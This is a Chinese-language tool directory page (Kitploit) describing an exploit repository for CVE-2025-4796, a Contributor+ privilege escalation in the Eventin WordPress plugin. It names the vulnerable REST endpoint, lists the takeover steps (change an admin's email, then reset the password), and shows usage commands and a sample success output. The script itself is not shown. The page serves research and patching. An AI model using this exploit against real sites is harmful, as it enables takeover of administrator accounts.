Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - 已认证(Contributor+)权限提升(通过用户邮箱更改/账户接管) | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-4796
身份验证与授权权限提升漏洞分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - 已认证(Contributor+)权限提升(通过用户邮箱更改/账户接管)

查看仓库
310个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-4796

Eventin <= 4.0.34 - 通过用户邮箱更改/帐户接管实现已认证(Contributor+)权限提升

🛡️ Eventin <= 4.0.34 - 已认证(Contributor+)权限提升 (CVE-2025-4796)

📌 概述

本仓库记录了一个存在于 Eventin WordPress 插件(<= 4.0.34)中的权限提升漏洞,该漏洞允许具有 Contributor+ 权限的已认证用户通过插件的演讲者更新 API 更改任意用户的电子邮件地址。通过更改管理员的电子邮件,攻击者可触发密码重置并实现帐户接管。

  • 漏洞组件:Eventin WordPress 插件 (Eventin\Speaker\Api\SpeakerController::update_item)

  • 受影响版本:<= 4.0.34

  • CVE:CVE-2025-4796

  • CVSS:8.8(高危)

  • 活跃安装量:10,000+

⚠️ 漏洞详情

Eventin 在更新演讲者/用户详细信息(尤其是电子邮件)之前,未正确验证调用方的身份或权限。以 Contributor(或更高权限)身份认证的攻击者可以使用插件 REST 端点更改其他用户(包括管理员)的电子邮件地址:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

一旦电子邮件被更改为攻击者控制的地址,即可利用标准的 WordPress 密码重置流程接管该帐户。

🧰 脚本(PoC)

文件名:CVE-2025-4796.py

此脚本自动执行以下步骤:

  1. 使用提供的凭据登录目标 WordPress 站点。
  2. 提取所需的 X-WP-Nonce
  3. 向 /wp-json/eventin/v2/speakers/<speaker_id> 发送 PUT 请求以更新演讲者的电子邮件。
  4. 打印并格式化 JSON 响应及一条专业的成功消息。

环境要求:

  • Python 3.8+
  • requests

安装:

root@kitploit:~
pip install requests

🚀 使用方法

从命令行运行脚本:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

显示脚本帮助:

root@kitploit:~
python CVE-2025-4796.py -h

📝 命令行选项(帮助)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ 成功输出示例

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ 负责任披露与免责声明

  • 本仓库仅供安全研究、测试和防御目的使用。
  • 请勿针对您不拥有或未经明确授权测试的系统使用这些技术。
  • 未经授权利用漏洞是非法且不道德的行为。
  • 如果您是站点所有者并认为自己的站点存在漏洞,请立即将 Eventin 更新到最新版本或应用供应商补丁。
  • 仅在授权环境中使用此代码(实验室、客户批准的渗透测试或获得明确许可的情况下)。

🧾 脚本功能概述

  • 验证输入(URL、电子邮件)并规范化 URL 架构。
  • 禁用 SSL 警告(可选;用于支持针对自签名开发实例的测试)。
  • 使用提供的 WP 凭据登录,并通过 Cookie 验证登录状态。
  • 从管理页面获取 X-WP-Nonce。
  • 发送经过认证的 PUT 请求以更新演讲者的电子邮件。
  • 打印格式化后的 JSON 响应及最终可读的成功摘要。

👤 致谢

作者:Khaled Alenaz (Nxploited)
GitHub:https://github.com/Nxploited/

下载工具